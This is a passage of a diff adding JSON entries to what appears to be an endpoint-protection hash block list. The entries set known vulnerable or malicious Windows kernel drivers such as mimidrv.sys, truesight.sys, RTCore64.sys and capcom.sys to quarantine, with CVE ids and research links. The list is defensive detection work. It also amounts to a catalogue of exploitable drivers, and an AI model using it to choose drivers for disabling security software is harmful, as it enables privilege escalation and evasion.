+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467355Z",
+ "creation_date": "2026-03-23T11:45:30.467359Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467368Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "714ac82a4e2b971f19df9c5cdcc7d7df52ac44ce1bfad675e50122406bed04a2",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff50e5fb-13b8-5020-8e94-0cfd02d550f3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808811Z",
+ "creation_date": "2026-03-23T11:45:31.808815Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808823Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0dc31969cb6816b185b4e3bb3e96b8344be4a31826c5d9a0a65d8411ba7d898",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff54fa68-6bc5-5e95-87d7-64773a1a2b35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469747Z",
+ "creation_date": "2026-03-23T11:45:30.469750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469759Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29d6155c68ff372a475d6fe5bde64caa68794bb4164f7e1aae7da5b744f6e6d2",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff6da08d-5126-57d9-b960-7b403a6518de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818238Z",
+ "creation_date": "2026-03-23T11:45:31.818241Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818249Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c96999c48ea74f5631b192f4ce4e64a137e10be4e8d35d68e5199758c2a1dd7c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff6e5dac-ebc3-5044-b75e-973cddfad7c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457187Z",
+ "creation_date": "2026-03-23T11:45:30.457190Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457199Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89d96210bf36a88acb14086c96e916b790d21b7adf81d0907c823ca2afbe0ce3",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff6ebc2e-387d-59ab-86b6-94d9422242cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818648Z",
+ "creation_date": "2026-03-23T11:45:30.818650Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818656Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f6e714528ad1b9eae72699078499735468140c1627e45f015762206ba7a77b47",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff849d11-b5d2-5733-92e5-ed5b5b4ae4db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810864Z",
+ "creation_date": "2026-03-23T11:45:31.810866Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810883Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56bc9c2039028f56ed4735492b4dd06e9042a5c8b3abd87055ae6f3ae5ce1d8b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff8eef78-9470-58c7-b2a5-19886bed49e4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808613Z",
+ "creation_date": "2026-03-23T11:45:31.808615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808620Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "97a17e66a5a57f9a605a12b28c1f9c19df376c6b1404403c3b7408c90835c4f9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff91ea5b-d69a-5ce6-95ce-1dde42bd504f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612474Z",
+ "creation_date": "2026-03-23T11:45:29.612476Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ff8bcc7f938ec71ee33fbe089d38e40a8190603558d4765c47b1b09e1dd764a",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff92cf25-74f6-53f9-810e-9e79c1b2d121",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142682Z",
+ "creation_date": "2026-03-23T11:45:31.142684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142690Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1427fc96e7fc1ece542fa47154ce48504dd0b894289e3840037c4e5f94c587d4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff93b0c8-1de4-50f4-913a-89cffcbbf120",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615954Z",
+ "creation_date": "2026-03-23T11:45:29.615956Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615962Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee15f36881b84a2da82fee37e8ad65e47f1224e64d1d6fe43f7a5ad2efe92f5d",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff97cfe3-92c8-5380-bdab-4c038330e5ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818842Z",
+ "creation_date": "2026-03-23T11:45:30.818844Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818850Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa4be68f1ea1e36aca95fd62b6727cf9d22886c2612391faeb9c56a1c62c2ec9",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff9b03e0-9bd2-5400-9c63-47c3f3ef8f19",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492196Z",
+ "creation_date": "2026-03-23T11:45:31.492198Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492204Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a832a08b2b26733b0b4263f27457ca0b8ab9c7451eb082957ea54f5404dc6ac8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ff9b7e8a-404e-56ea-adb3-b4e32c5d6c99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980918Z",
+ "creation_date": "2026-03-23T11:45:29.980919Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980925Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7bba82777c9912e6a728c3e873c5a8fd3546982e0d5fa88e64b3e2122f9bc3b",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ffa30052-3e61-5e4f-90c3-9f19529f6670",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479811Z",
+ "creation_date": "2026-03-23T11:45:30.479812Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479818Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2562e0101cb39906c73b96fc15a6e6e3edd710b19858f6bbd0c90f1561b6038",
+ "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ffa6b26f-4ad2-54b9-9195-4e207ad7783b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825664Z",
+ "creation_date": "2026-03-23T11:45:31.825666Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825671Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb80778406fd8002b361bbcba3b20a36c36994c3c3f0de80bf83f566cf5f897b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ffab4dd8-97ec-58a1-8226-d235b0be3186",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146259Z",
+ "creation_date": "2026-03-23T11:45:31.146261Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146267Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f77cb6e917aa001b995d40e33368e33ac666b1ac0523cf7c8a1f86bb95948fb3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ffc01bb1-7d0b-5e60-8d34-39cf0f99ecc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611096Z",
+ "creation_date": "2026-03-23T11:45:29.611098Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611103Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e423caaff9002b38e1d90005df181aa2b3711ebbf6d1eb83941656ccc313811",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ffce4a39-7dcb-5f7d-8bc8-a767df6c5eda",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460920Z",
+ "creation_date": "2026-03-23T11:45:30.460923Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6c05b10a5c090b743a61fa225b09e390e2dd2bd6cb4fd96b987f1e0d3f2124a",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ffe0b548-ab82-55ae-981e-2371fa2228b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614523Z",
+ "creation_date": "2026-03-23T11:45:29.614525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d9e83b189fcf5c3541c62d1f54a0da0a4e5b62c3243d2989afc46644056c8e3",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ffecf71a-e24b-5d1a-9ee6-20cec15f1657",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490155Z",
+ "creation_date": "2026-03-23T11:45:31.490157Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490163Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2580bdb0cc7653417276370992f103a0b1c8a38642eedd0feebd4c1f80aec21a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fffac2a2-4dcb-550d-b78f-019c96dbeac6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836244Z",
+ "creation_date": "2026-03-23T11:45:30.836246Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836252Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0d154893940c8abe95477321fcc006636423d9584baa76007013eeb7de56881",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fffb5883-28f0-5309-ae4d-701c30284f96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
